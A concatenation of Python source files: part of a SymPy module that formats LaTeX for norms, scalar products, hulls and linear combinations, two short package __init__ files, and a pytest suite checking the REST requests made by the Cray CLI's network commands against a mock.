x_text = x
if subscript is None:
ret_text = f"\left{lbracket_string} {x_text} \\right{rbracket_string} "
else:
ret_text = (
f"\left{lbracket_string} {x_text} \\right{rbracket_string}_{subscript}"
)
if formula_align:
op = f"&{formula_op}"
else:
op = f"{formula_op}"
if formula is not None:
if not formula_latex:
if formula_suffix:
ret_text += f"{op} {eval_formula(formula)}"
else:
ret_text = f"{eval_formula(formula)} {op}" + ret_text
else:
if formula_suffix:
ret_text += f"{op} {formula}"
else:
ret_text = f"{formula} {op}" + ret_text
if not display:
return ret_text
else:
return Math(ret_text)
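Stripped of the SymPy and formula plumbing, the unary assembly above is plain string formatting; a dependency-free sketch with a hypothetical `wrap` helper, assuming the body is already a LaTeX string:

```python
def wrap(body, lb="(", rb=")", subscript=None):
    # \left<lb> body \right<rb>, optionally followed by _subscript
    text = f"\\left{lb} {body} \\right{rb}"
    return text if subscript is None else f"{text}_{subscript}"

print(wrap("x + y"))                 # \left( x + y \right)
print(wrap("v", "\\|", "\\|", "2"))  # \left\| v \right\|_2
```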
def binary_bracket(
x,
y,
formula=None,
lbracket_string="(",
rbracket_string=")",
formula_op="=",
formula_align=False,
subscript=None,
display=False,
x_latex=False,
y_latex=False,
formula_latex=False,
formula_suffix=True,
):
"""Internal function to pretty print all binary bracketed formulae with sympy. In particular scalar products, etc. can be printed with this.
Args:
x (string or sympy expression): Content of binary symbol you want to pretty print, left expression.
y (string or sympy expression): Content of binary symbol you want to pretty print, right expression.
        formula (sympy expression or LaTeX string, optional): Additional artifacts you want to render along your binary. Either "evaluates to" or "is equal to" would be good ways to interpret what to put here. Defaults to None.
lbracket_string (str, optional): LaTeX bracket type on the left hand side of the unary. Defaults to "(".
rbracket_string (str, optional): LaTeX bracket type on the right hand side of the unary. Defaults to ")".
formula_op (str, optional): If there is a formula, what should be the operator that separates the formula from the unary? Defaults to "=".
formula_align (bool, optional): Whether to add a '&' character for including in align LaTeX environments to the operator symbol. Defaults to False.
        subscript (str, optional): Add a subscript to the right hand bracket if not None. Defaults to None.
display (bool, optional): If False, returns LaTeX string output. If True, returns Math rendering of LaTeX string. Defaults to False.
x_latex (bool, optional): Whether the content of the binary left is LaTeX (True) or Sympy Expression (False). Defaults to False.
y_latex (bool, optional): Whether the content of the binary right is LaTeX (True) or Sympy Expression (False). Defaults to False.
formula_latex (bool, optional): Whether the content of the formula is LaTeX (True) or Sympy Expression (False). Defaults to False.
formula_suffix (bool, optional): Whether formula comes first (False) or the binary (True). Defaults to True.
Returns:
[str or Math render]: Either LaTeX string or IPython rendering thereof.
"""
if not x_latex:
x_text = printing.default_latex(x)
else:
x_text = x
if not y_latex:
y_text = printing.default_latex(y)
else:
y_text = y
if subscript is None:
ret_text = (
f"\left{lbracket_string} {x_text} , {y_text} \\right{rbracket_string} "
)
else:
ret_text = f"\left{lbracket_string} {x_text} , {y_text} \\right{rbracket_string}_{subscript}"
if formula_align:
op = f"&{formula_op}"
else:
op = f"{formula_op}"
if formula is not None:
if not formula_latex:
if formula_suffix:
ret_text += f"{op} {eval_formula(formula)}"
else:
ret_text = f"{eval_formula(formula)} {op}" + ret_text
else:
if formula_suffix:
ret_text += f"{op} {formula}"
else:
ret_text = f"{formula} {op}" + ret_text
if not display:
return ret_text
else:
return Math(ret_text)
def n_ary_bracket(
items,
formula=None,
    prefix="",
lbracket_string="(",
rbracket_string=")",
formula_op="=",
formula_align=False,
subscript=None,
display=False,
items_latex=False,
formula_latex=False,
formula_suffix=True,
):
"""Internal function to pretty print all n-ary bracketed formulae with sympy. In particular vector systems, convex hulls, etc. can be printed with this.
Args:
        items (list of strings or sympy expressions, has to be uniform): Content of the n-ary symbol you want to pretty print.
        prefix (str, optional): LaTeX string rendered immediately before the left bracket (e.g. an operator name such as \operatorname{conv}).
        formula (sympy expression or LaTeX string, optional): Additional artifacts you want to render along your n-ary. Either "evaluates to" or "is equal to" would be good ways to interpret what to put here. Defaults to None.
lbracket_string (str, optional): LaTeX bracket type on the left hand side of the unary. Defaults to "(".
rbracket_string (str, optional): LaTeX bracket type on the right hand side of the unary. Defaults to ")".
formula_op (str, optional): If there is a formula, what should be the operator that separates the formula from the unary? Defaults to "=".
formula_align (bool, optional): Whether to add a '&' character for including in align LaTeX environments to the operator symbol. Defaults to False.
        subscript (str, optional): Add a subscript to the right hand bracket if not None. Defaults to None.
display (bool, optional): If False, returns LaTeX string output. If True, returns Math rendering of LaTeX string. Defaults to False.
items_latex (bool, optional): Whether the content of the n-ary is LaTeX (True) or Sympy Expression (False). Defaults to False.
formula_latex (bool, optional): Whether the content of the formula is LaTeX (True) or Sympy Expression (False). Defaults to False.
formula_suffix (bool, optional): Whether formula comes first (False) or the n-ary (True). Defaults to True.
Returns:
[str or Math render]: Either LaTeX string or IPython rendering thereof.
"""
if len(items) < 1:
print("No items received, not printing anything.")
return
if not items_latex:
items_text = [eval_formula(x) for x in items]
else:
items_text = items
# Setting up what's going to be inside the brackets
term_count = len(items)
base_string = "{}"
for i in range(1, term_count):
base_string += ", {} "
in_brackets = base_string.format(*items_text)
if subscript is None:
ret_text = "{}\left{} {} \\right{} ".format(
prefix, lbracket_string, in_brackets, rbracket_string
)
    else:
        ret_text = "{}\left{} {} \\right{}_{}".format(
            prefix, lbracket_string, in_brackets, rbracket_string, subscript
        )
if formula_align:
op = f"&{formula_op}"
else:
op = f"{formula_op}"
if formula is not None:
if not formula_latex:
if formula_suffix:
ret_text += f"{op} {eval_formula(formula)}"
else:
ret_text = f"{eval_formula(formula)} {op}" + ret_text
else: # we got latex formula
if formula_suffix:
ret_text += f"{op} {formula}"
else:
ret_text = f"{formula} {op}" + ret_text
if not display:
return ret_text
else:
return Math(ret_text)
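The counting loop that builds `base_string` above is equivalent to a single `str.join`; a stdlib-only sketch with a hypothetical `n_ary` helper, again assuming the items are already LaTeX strings:

```python
def n_ary(items, prefix="", lb="\\{", rb="\\}"):
    # Join the already-rendered items and wrap them, with an optional prefix
    inner = ", ".join(items)
    return f"{prefix}\\left{lb} {inner} \\right{rb}"

print(n_ary(["v_1", "v_2", "v_3"], prefix="\\operatorname{conv}"))
# \operatorname{conv}\left\{ v_1, v_2, v_3 \right\}
```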
def scalar_product(
x,
y,
formula=None,
formula_op="=",
formula_align=False,
subscript=None,
display=False,
x_latex=False,
y_latex=False,
formula_latex=False,
):
"""Pretty print scalar products of the form <x,y>. Special case of binary_bracket with \langle and \\rangle.
Args:
x (string or sympy expression): Content of left element you want to pretty print.
y (string or sympy expression): Content of right element you want to pretty print.
        formula (sympy expression or LaTeX string, optional): Additional artifacts you want to render along your scalar product. Either "evaluates to" or "is equal to" would be good ways to interpret what to put here. Defaults to None.
formula_op (str, optional): If there is a formula, what should be the operator that separates the formula from the unary? Defaults to "=".
formula_align (bool, optional): Whether to add a '&' character for including in align LaTeX environments to the operator symbol. Defaults to False.
subscript ([type], optional): Add a subscript to the right hand bracket if not None. Defaults to None.
display (bool, optional): If False, returns LaTeX string output. If True, returns Math rendering of LaTeX string. Defaults to False.
x_latex (bool, optional): Whether the content of the left element is LaTeX (True) or Sympy Expression (False). Defaults to False.
y_latex (bool, optional): Whether the content of the right element is LaTeX (True) or Sympy Expression (False). Defaults to False.
formula_latex (bool, optional): Whether the content of the formula is LaTeX (True) or Sympy Expression (False). Defaults to False.
formula_suffix (bool, optional): Whether formula comes first (False) or the scalar product (True). Defaults to True.
Returns:
[str or Math render]: Either LaTeX string or IPython rendering thereof.
"""
return binary_bracket(
x,
y,
formula=formula,
lbracket_string="\\langle",
rbracket_string="\\rangle",
formula_op=formula_op,
formula_align=formula_align,
subscript=subscript,
display=display,
x_latex=x_latex,
y_latex=y_latex,
formula_latex=formula_latex,
)
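A minimal sketch of the LaTeX that `scalar_product` is meant to produce (string assembly only; `sketch_scalar_product` is a hypothetical stand-in for the `binary_bracket` call, which is defined earlier in this file):

```python
def sketch_scalar_product(x, y, formula=None, op="="):
    # \left\langle x, y \right\rangle, optionally followed by "= formula"
    text = "\\left\\langle {}, {} \\right\\rangle".format(x, y)
    if formula is not None:
        text += " {} {}".format(op, formula)
    return text

print(sketch_scalar_product("u", "v", formula="u^{T} v"))
```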
def norm(
x,
formula=None,
formula_op="=",
formula_align=False,
subscript=None,
display=False,
x_latex=False,
formula_latex=False,
):
"""Pretty print norms of the form ||x||. Special case of unary_bracket with \\| and \\|.
Args:
x (string or sympy expression): Content of the norm you want to pretty print.
formula (sympy expression or LaTeX string, optional): Additional artifacts you want to render along your norm. Either "evaluates to" or "is equal to" would be good ways to interpret what to put here. Defaults to None.
formula_op (str, optional): If there is a formula, what should be the operator that separates the formula from the norm? Defaults to "=".
formula_align (bool, optional): Whether to add a '&' character for including in align LaTeX environments to the operator symbol. Defaults to False.
subscript ([type], optional): Add a subscript to the right hand bracket if not None. Defaults to None.
display (bool, optional): If False, returns LaTeX string output. If True, returns Math rendering of LaTeX string. Defaults to False.
x_latex (bool, optional): Whether the content of the norm is LaTeX (True) or Sympy Expression (False). Defaults to False.
formula_latex (bool, optional): Whether the content of the formula is LaTeX (True) or Sympy Expression (False). Defaults to False.
formula_suffix (bool, optional): Whether formula comes first (False) or the norm (True). Defaults to True.
Returns:
[str or Math render]: Either LaTeX string or IPython rendering thereof.
"""
return unary_bracket(
x,
formula=formula,
lbracket_string="\|",
rbracket_string="\|",
formula_op=formula_op,
formula_align=formula_align,
subscript=subscript,
display=display,
x_latex=x_latex,
formula_latex=formula_latex,
)
def eqn_align(eqn_list, display=False):
"""Equation array pretty printing. Requires a list of pre-pared LaTeX strings which are then substituted to an appropriately sized align LaTeX environment. Please make sure that all item elements were generated with alignment characters (c.f. formula_align parameters of bracketed expressions).
Args:
eqn_list (list of str): Pre-rendered LaTeX strings, one per row of the align environment.
display (bool, optional): If False, returns LaTeX string output. If True, returns Math rendering of LaTeX string. Defaults to False.
Returns:
[str or Math render]: Either LaTeX string or IPython rendering thereof.
"""
if len(eqn_list) < 1:
print("No equations received, not printing anything.")
return
eqn_count = len(eqn_list)
base_string = "{}"
for i in range(1, eqn_count):
base_string = base_string + "\\\\ {}"
start = "\\begin{{align}} "
end = " \\end{{align}}"
full_string = start + base_string + end
eqnarray_string = full_string.format(*eqn_list)
if not display:
return eqnarray_string
return Math(eqnarray_string)
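The align-environment assembly above can be sketched in a few self-contained lines (`sketch_eqn_align` is a hypothetical helper; note the doubled braces so `str.format` leaves `{align}` intact):

```python
def sketch_eqn_align(eqns):
    # one "{}" slot per equation, separated by the LaTeX line break "\\"
    body = "{}" + "\\\\ {}" * (len(eqns) - 1)
    return ("\\begin{{align}} " + body + " \\end{{align}}").format(*eqns)

print(sketch_eqn_align(["x &= 1", "y &= 2"]))
```

The `&` alignment characters are expected to come pre-baked in each equation string, as the docstring of `eqn_align` notes.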
def linear_combination(
coefs,
vectors,
formula,
formula_op="=",
formula_align=False,
display=False,
coef_latex=False,
vector_latex=False,
formula_latex=False,
formula_suffix=True,
):
"""Pretty print linear combinations of the form c_1 \\cdot v_1 + ... + c_n \\cdot v_n. Accepts the same formula/display options as the bracket printers above."""
if len(coefs) < 1 or len(vectors) < 1:
print("No coefs or vectors received, not printing anything.")
return
if len(coefs) != len(vectors):
print(
"The number of coefficients and vectors do not agree. Please provide an equal number of coefficients and vectors."
)
return
term_count = len(coefs)
base_string = "{} \\cdot {}"
for i in range(1, term_count):
base_string += " + {} \\cdot {}"
if not coef_latex:
coefs_interpret = [eval_formula(x) for x in coefs]
else:
coefs_interpret = coefs
if not vector_latex:
vectors_interpret = [eval_formula(x) for x in vectors]
else:
vectors_interpret = vectors
# merge the coef and vector arrays alternatingly
sub_list = [
x
for x in itertools.chain.from_iterable(
itertools.zip_longest(coefs_interpret, vectors_interpret)
)
if x is not None # drop only zip_longest fill values, keep falsy strings like "0"
]
if formula_align:
op = "&{}".format(formula_op)
else:
op = "{}".format(formula_op)
if formula is not None:
if not formula_latex:
if formula_suffix:
base_string += "{} {}"
sub_list += [op, eval_formula(formula)]
else:
base_string = "{} {}" + base_string
sub_list = [eval_formula(formula), op] + sub_list
else:
if formula_suffix:
base_string += "{} {}"
sub_list += [op, formula]
else:
base_string = "{} {}" + base_string
sub_list = [formula, op] + sub_list
comb_string = base_string.format(*sub_list)
if not display:
return comb_string
return Math(comb_string)
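The interleaving step in `linear_combination` is the subtle part: `zip_longest` pairs coefficient i with vector i and `chain.from_iterable` flattens the pairs. A standalone demonstration (illustrative string values):

```python
import itertools

coefs = ["2", "a"]
vecs = ["v_1", "v_2"]
# pair coefficient i with vector i, then flatten: [c1, v1, c2, v2, ...]
interleaved = [x for x in itertools.chain.from_iterable(
    itertools.zip_longest(coefs, vecs)) if x is not None]
template = "{} \\cdot {}" + " + {} \\cdot {}" * (len(coefs) - 1)
print(template.format(*interleaved))
```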
def linear_hull(
items,
formula=None,
formula_op="=",
formula_align=False,
subscript=None,
display=False,
items_latex=False,
formula_latex=False,
formula_suffix=True,
):
return n_ary_bracket(
items,
formula=formula,
prefix="\\text{lin}",
lbracket_string="(",
rbracket_string=")",
formula_op=formula_op,
formula_align=formula_align,
subscript=subscript,
display=display,
items_latex=items_latex,
formula_latex=formula_latex,
formula_suffix=formula_suffix,
)
def convex_hull(
items,
formula=None,
formula_op="=",
formula_align=False,
subscript=None,
display=False,
items_latex=False,
formula_latex=False,
formula_suffix=True,
):
return n_ary_bracket(
items,
formula=formula,
prefix="\\text{co}",
lbracket_string="(",
rbracket_string=")",
formula_op=formula_op,
formula_align=formula_align,
subscript=subscript,
display=display,
items_latex=items_latex,
formula_latex=formula_latex,
formula_suffix=formula_suffix,
)
def affine_hull(
items,
formula=None,
formula_op="=",
formula_align=False,
subscript=None,
display=False,
items_latex=False,
formula_latex=False,
formula_suffix=True,
):
return n_ary_bracket(
items,
formula=formula,
prefix="\\text{aff}",
lbracket_string="(",
rbracket_string=")",
formula_op=formula_op,
formula_align=formula_align,
subscript=subscript,
display=display,
items_latex=items_latex,
formula_latex=formula_latex,
formula_suffix=formula_suffix,
)
def generate_parametric_poly(degree, symbol="x", coef="a", domain="ZZ", display=True):
"""Generate a polynomial sum of coef_i * symbol**i for i = 0 .. degree - 1 with symbolic real coefficients. Note that the highest power is degree - 1; the domain and display arguments are currently unused."""
from sympy import Symbol, parse_expr
coefs = [Symbol(f"{coef}_{i}", real=True) for i in range(0, degree)]
expr = ""
for i in range(0, degree):
expr += f"+ {coefs[i]}*{symbol}**{i}"
return parse_expr(expr)
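Before `parse_expr` sees it, the coefficient string is built purely by concatenation; this sympy-free sketch (`sketch_poly_expr` is a hypothetical helper) shows the exact string for degree 3:

```python
def sketch_poly_expr(degree, symbol="x", coef="a"):
    # replicate the loop above with plain strings instead of sympy Symbols
    expr = ""
    for i in range(degree):
        expr += f"+ {coef}_{i}*{symbol}**{i}"
    return expr

print(sketch_poly_expr(3))
```

The leading `+` is harmless: sympy's parser treats it as unary plus.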
def show_eigenvects(symbol, eigenvect_list):
formulae = []
for i in range(0, len(eigenvect_list)):
eigenvalue = "{" + str(eigenvect_list[i][0]) + "}"
eigenv_mult = eigenvect_list[i][1] # algebraic multiplicity, currently unused
eigenvectors = eigenvect_list[i][2]
formulae += [
show_matrix(
"{}_{}".format(symbol, eigenvalue),
Matrix([eigenvectors]),
display=False,
formula_align=True,
)
]
return eqn_align(formulae, display=True)
# === tardis/montecarlo/__init__.py (repo: GOLoDovkA-A/tardis, license: BSD-3-Clause) ===
from tardis.montecarlo.base import *
# === moto/iot/__init__.py (repo: jonnangle/moto-1, license: Apache-2.0) ===
from __future__ import unicode_literals
from .models import iot_backends
from ..core.models import base_decorator
iot_backend = iot_backends["us-east-1"]
mock_iot = base_decorator(iot_backends)
| 27.857143 | 40 | 0.830769 | 29 | 195 | 5.172414 | 0.551724 | 0.22 | 0.213333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005682 | 0.097436 | 195 | 6 | 41 | 32.5 | 0.846591 | 0 | 0 | 0 | 0 | 0 | 0.046154 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.6 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
# === tests/test_functional/test_network.py (repo: ardangelo/craycli, license: MIT) ===
""" Test the main CLI command (`cray`) and options.
MIT License
(C) Copyright [2020] Hewlett Packard Enterprise Development LP
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included
in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR
OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
"""
# pylint: disable=redefined-outer-name, invalid-name, unused-import
# pylint: disable=too-many-arguments, unused-argument
import json
import os
import re
from ..utils.runner import cli_runner
from ..utils.rest import rest_mock
basePath = 'apis/network/v1'
def test_cray_nms_network_base(cli_runner, rest_mock):
""" Test `cray network` to make sure the expected commands are available """
# pylint: disable=protected-access
runner, cli, _ = cli_runner
result = runner.invoke(cli, ['network'])
assert result.exit_code == 0
outputs = [
"Network Manager REST API",
"networks",
"nics",
"list",
"network [OPTIONS] COMMAND [ARGS]..."
]
for out in outputs:
assert out in result.output
# GET /lswitches
runner, cli, _ = cli_runner
result = runner.invoke(cli, ['network', 'list'])
assert result.exit_code == 0
data = json.loads(result.output)
assert (
re.match(
'/'.join(['(.*)', basePath, 'lswitches'])+"$", data['url']
) is not None
)
assert data['method'] == 'GET'
assert not 'body' in data
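The URL assertions in these tests join path pieces into a regex; the leading `(.*)` absorbs the scheme and host of the mocked URL. A quick standalone check of the pattern shape:

```python
import re

basePath = 'apis/network/v1'
pattern = '/'.join(['(.*)', basePath, 'lswitches']) + "$"
print(pattern)
# the anchor "$" forces a full-path match against the recorded request URL
match = re.match(pattern, "https://appliance/apis/network/v1/lswitches")
```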
def test_cray_nms_nics(cli_runner, rest_mock):
""" Test `cray network nics` to make sure the expected commands are available
This command is currently a stub, and not implemented.
So there is no "function" to test beyond existence at the moment.
"""
# pylint: disable=protected-access
runner, cli, _ = cli_runner
result = runner.invoke(cli, ['network', 'nics'])
assert result.exit_code == 0
outputs = [
"Usage: cli network nics [OPTIONS] COMMAND [ARGS]...",
"list"
]
for out in outputs:
assert out in result.output
#
# Check the request URL and Body
#
# GET /lswitches/singleFabric/nics
runner, cli, _ = cli_runner
result = runner.invoke(cli, ['network', 'nics', 'list', 'singleFabric'])
assert result.exit_code == 0
data = json.loads(result.output)
assert (
re.match(
'/'.join(
['(.*)', basePath, 'lswitches/singleFabric/nics']
)+"$", data['url']
) is not None
)
assert data['method'] == 'GET'
assert not 'body' in data
def test_cray_nms_networks(cli_runner, rest_mock):
""" Test `cray network networks` to make sure the expected commands
are available
This command is currently a stub, and not implemented.
So there is no "function" to test beyond existence at the moment.
"""
# pylint: disable=protected-access
runner, cli, _ = cli_runner
result = runner.invoke(cli, ['network', 'networks'])
assert result.exit_code == 0
outputs = [
"Usage: cli network networks [OPTIONS] COMMAND [ARGS]...",
"dnsservices",
"nics",
"create",
"delete",
"describe",
"list"
]
for out in outputs:
assert out in result.output
#
# Check the request URL and Body
#
# POST /lswitches/singleFabric/networks only required
runner, cli, _ = cli_runner
result = runner.invoke(
cli,
['network', 'networks', 'create', "--vlan-id", "100",
"--net-cidr", "10.0.1.0/24", "--name", "net1",
"singleFabric"]
)
assert result.exit_code == 0
data = json.loads(result.output)
assert (
re.match(
'/'.join(
['(.*)', basePath, 'lswitches/singleFabric/networks']
)+"$", data['url']
) is not None
)
assert data['method'] == 'POST'
assert data['body'] == {
'vlanID':100,
'netCIDR': '10.0.1.0/24',
'name': 'net1'
}
# Check the response from server ... no mock available
# POST /lswitches/singleFabric/networks with optionals
runner, cli, _ = cli_runner
result = runner.invoke(
cli,
['network', 'networks', 'create', "--vlan-id", "100",
"--net-cidr", "10.0.1.0/24", "--name", "net1",
"--nic-xnames", 'nic1, nic2', "--ipv6-prefix",
"ipPrefix", "singleFabric"]
)
assert result.exit_code == 0
data = json.loads(result.output)
assert (
re.match(
'/'.join(
['(.*)', basePath, 'lswitches/singleFabric/networks']
)+"$", data['url']
) is not None
)
assert data['method'] == 'POST'
assert data['body'] == {
'vlanID':100,
'netCIDR': '10.0.1.0/24',
'name': 'net1',
'nicXnames': ["nic1", "nic2"],
'ipv6Prefix': 'ipPrefix'
}
# Check the response from server ... no mock available
# GET /lswitches/singleFabric/networks
runner, cli, _ = cli_runner
result = runner.invoke(
cli, ['network', 'networks', 'list', 'singleFabric']
)
assert result.exit_code == 0
data = json.loads(result.output)
assert (
re.match(
'/'.join(
['(.*)', basePath, 'lswitches/singleFabric/networks']
)+"$", data['url']
) is not None
)
assert data['method'] == 'GET'
assert not 'body' in data
# GET /lswitches/singleFabric/networks/{netName}
runner, cli, _ = cli_runner
result = runner.invoke(cli, ['network', 'networks', 'describe', 'net1',
'singleFabric'])
assert result.exit_code == 0
data = json.loads(result.output)
assert (
re.match(
'/'.join(
[
'(.*)',
basePath,
'lswitches/singleFabric/networks/net1']
)+"$", data['url']
) is not None
)
assert data['method'] == 'GET'
assert not 'body' in data
# Check the response from server ... no mock available
# DELETE /lswitches/singleFabric/networks/{netName}
runner, cli, _ = cli_runner
result = runner.invoke(
cli,
['network', 'networks', 'delete', 'net1', 'singleFabric']
)
assert result.exit_code == 0
data = json.loads(result.output)
assert (
re.match(
'/'.join(
[
'(.*)',
basePath,
'lswitches/singleFabric/networks/net1'
]
)+"$", data['url']
) is not None
)
assert data['method'] == 'DELETE'
assert not 'body' in data
def test_cray_nms_networks_nics(cli_runner, rest_mock):
""" Test `cray network networks nics` to make sure the expected commands
are available
This command is currently a stub, and not implemented.
So there is no "function" to test beyond existence at the moment.
"""
# pylint: disable=protected-access
runner, cli, _ = cli_runner
result = runner.invoke(cli, ['network', 'networks', 'nics'])
assert result.exit_code == 0
outputs = [
"Usage: cli network networks nics [OPTIONS] COMMAND [ARGS]...",
"create",
"delete",
"describe",
"list"
]
for out in outputs:
assert out in result.output
#
# Check the request URL and Body
#
nicsPath = 'lswitches/singleFabric/networks/net1/nics'
# POST /lswitches/singleFabric/networks/{netName}/nics
runner, cli, _ = cli_runner
result = runner.invoke(
cli, ['network', 'networks', 'nics', 'create',
'--nic-xnames', 'nic1, nic2', 'net1', 'singleFabric']
)
assert result.exit_code == 0
data = json.loads(result.output)
assert (
re.match(
'/'.join(['(.*)', basePath, nicsPath])+"$", data['url']
) is not None
)
assert data['method'] == 'POST'
assert data['body'] == {'nicXnames': ["nic1", "nic2"]}
# Check the response from server ... no mock available
# GET /lswitches/singleFabric/networks/{netName}/nics
runner, cli, _ = cli_runner
result = runner.invoke(cli, ['network', 'networks', 'nics', 'list',
'net1', 'singleFabric'])
assert result.exit_code == 0
data = json.loads(result.output)
assert (
re.match(
'/'.join(['(.*)', basePath, nicsPath])+"$", data['url']
) is not None
)
assert data['method'] == 'GET'
assert not 'body' in data
# Check the response from server ... no mock available
# DELETE /lswitches/singleFabric/networks/{netName}/nics
runner, cli, _ = cli_runner
result = runner.invoke(
cli,
['network', 'networks', 'nics', 'delete',
'--nic-xnames', 'nic1, nic2', 'net1', 'singleFabric']
)
assert result.exit_code == 0
data = json.loads(result.output)
assert (
re.match(
'/'.join(['(.*)', basePath, nicsPath])+"$", data['url']
) is not None
)
assert data['method'] == 'DELETE'
assert data['body'] == {'nicXnames': ["nic1", "nic2"]}
# Check the response from server ... no mock available
# GET /lswitches/singleFabric/networks/{netName}/nics/{nicXname}
runner, cli, _ = cli_runner
result = runner.invoke(
cli,
['network', 'networks', 'nics', 'describe', 'nic1',
'net1', 'singleFabric']
)
assert result.exit_code == 0
data = json.loads(result.output)
assert (
re.match(
'/'.join(['(.*)', basePath, nicsPath + '/nic1'])+"$", data['url']
) is not None
)
assert data['method'] == 'GET'
assert not 'body' in data
# Check the response from server ... no mock available
# DELETE /lswitches/singleFabric/networks/{netName}/nics/{nicXname}
#runner, cli, _ = cli_runner
#result = runner.invoke(cli, ['network', 'networks', 'nics', 'delete', 'nic1',
# 'net1', 'singleFabric'])
#assert result.exit_code == 0
#data = json.loads(result.output)
#assert re.match('/'.join(['(.*)', basePath, nicsPath + '/nic1'])+"$", data['url']) != None
#assert data['method'] == 'DELETE'
# Check the response from server ... no mock available
def test_cray_nms_networks_dnsservices(cli_runner, rest_mock):
"""Test `cray network networks dnsservices` to make sure the expected
commands are available
This command is currently a stub, and not implemented.
So there is no "function" to test beyond existence at the moment.
"""
# pylint: disable=protected-access
runner, cli, _ = cli_runner
result = runner.invoke(cli, ['network', 'networks', 'dnsservices'])
assert result.exit_code == 0
outputs = [
"Usage: cli network networks dnsservices [OPTIONS] COMMAND [ARGS]...",
"hosts",
"list"
]
for out in outputs:
assert out in result.output
dnsPath = 'lswitches/singleFabric/networks/net1/dnsservices'
#
# Check the request URL and Body
#
# GET /lswitches/singleFabric/networks/{netName}/dnsservices
runner, cli, _ = cli_runner
result = runner.invoke(cli, ['network', 'networks', 'dnsservices', 'list',
'net1', 'singleFabric'])
assert result.exit_code == 0
data = json.loads(result.output)
assert (
re.match(
'/'.join(['(.*)', basePath, dnsPath])+"$", data['url']
) is not None
)
assert data['method'] == 'GET'
assert not 'body' in data
# Check the response from server ... no mock available
def test_cray_nms_networks_dnsservices_hosts(cli_runner, rest_mock):
""" Test `cray network networks dnsservices hosts` to make sure the
expected commands are available.
This command is currently a stub, and not implemented.
So there is no "function" to test beyond existence at the moment.
"""
# pylint: disable=protected-access
runner, cli, _ = cli_runner
result = runner.invoke(
cli,
['network', 'networks', 'dnsservices', 'hosts']
)
assert result.exit_code == 0
outputs = [
"Usage: cli network networks dnsservices hosts [OPTIONS] COMMAND [ARGS]...",
"create",
"delete",
"describe",
"list",
"replace",
"update"
]
for out in outputs:
assert out in result.output
dnsHostPath = 'lswitches/singleFabric/networks/net1/dnsservices/dns1/hosts'
# GET /lswitches/singleFabric/networks/{netName}/dnsservices/{instanceId}/hosts
runner, cli, _ = cli_runner
result = runner.invoke(cli, ['network', 'networks', 'dnsservices', 'hosts',
'list', 'dns1', 'net1', 'singleFabric'])
assert result.exit_code == 0
data = json.loads(result.output)
assert (
re.match(
'/'.join(['(.*)', basePath, dnsHostPath])+"$", data['url']
) is not None
)
assert data['method'] == 'GET'
assert not 'body' in data
# Check the response from server ... no mock available
# POST /lswitches/singleFabric/networks/{netName}/dnsservices/{instanceId}/hosts
runner, cli, _ = cli_runner
result = runner.invoke(cli, ['network', 'networks', 'dnsservices', 'hosts',
'create', '--host-ip', 'ip1', '--host-name',
'host1', 'dns1', 'net1', 'singleFabric'])
assert result.exit_code == 0
data = json.loads(result.output)
assert (
re.match(
'/'.join(['(.*)', basePath, dnsHostPath])+"$", data['url']
) is not None
)
assert data['method'] == 'POST'
assert data['body'] == {'hostIP': 'ip1', 'hostName': 'host1'}
# Check the response from server ... no mock available
# GET /lswitches/singleFabric/networks/{netName}/dnsservices/{instanceId}/hosts/{hostEntryId}
runner, cli, _ = cli_runner
result = runner.invoke(
cli,
[
'network', 'networks', 'dnsservices', 'hosts',
'describe', 'ip1', 'dns1', 'net1', 'singleFabric'
]
)
assert result.exit_code == 0
data = json.loads(result.output)
assert (
re.match(
'/'.join(['(.*)', basePath, dnsHostPath + '/ip1'])+"$", data['url']
) is not None
)
assert data['method'] == 'GET'
assert not 'body' in data
# Check the response from server ... no mock available
# DELETE /lswitches/singleFabric/networks/{netName}/dnsservices/{instanceId}/hosts/{hostEntryId}
runner, cli, _ = cli_runner
result = runner.invoke(
cli,
[
'network', 'networks', 'dnsservices', 'hosts',
'delete', 'ip1', 'dns1', 'net1', 'singleFabric'
]
)
assert result.exit_code == 0
data = json.loads(result.output)
assert (
re.match(
'/'.join(['(.*)', basePath, dnsHostPath + '/ip1'])+"$", data['url']
) is not None
)
assert data['method'] == 'DELETE'
assert not 'body' in data
# Check the response from server ... no mock available
# PUT /lswitches/singleFabric/networks/{netName}/dnsservices/{instanceId}/hosts/{hostEntryId}
runner, cli, _ = cli_runner
result = runner.invoke(
cli,
[
'network', 'networks', 'dnsservices', 'hosts',
'replace', '--host-ip', 'ip1', '--host-name', 'host1',
'--host-aliases', 'alias1, alias2', 'ip1', 'dns1',
'net1', 'singleFabric'
]
)
assert result.exit_code == 0
data = json.loads(result.output)
assert (
re.match(
'/'.join(['(.*)', basePath, dnsHostPath + '/ip1'])+"$", data['url']
) is not None
)
assert data['method'] == 'PUT'
assert data['body'] == {'hostIP': 'ip1', 'hostName': 'host1',
'hostAliases':["alias1", "alias2"]}
# Check the response from server ... no mock available
# PATCH /lswitches/singleFabric/networks/{netName}/dnsservices/{instanceId}/hosts/{hostEntryId}
runner, cli, _ = cli_runner
result = runner.invoke(
cli,
[
'network', 'networks', 'dnsservices', 'hosts',
'update', '--host-ip', 'ip1', '--host-aliases',
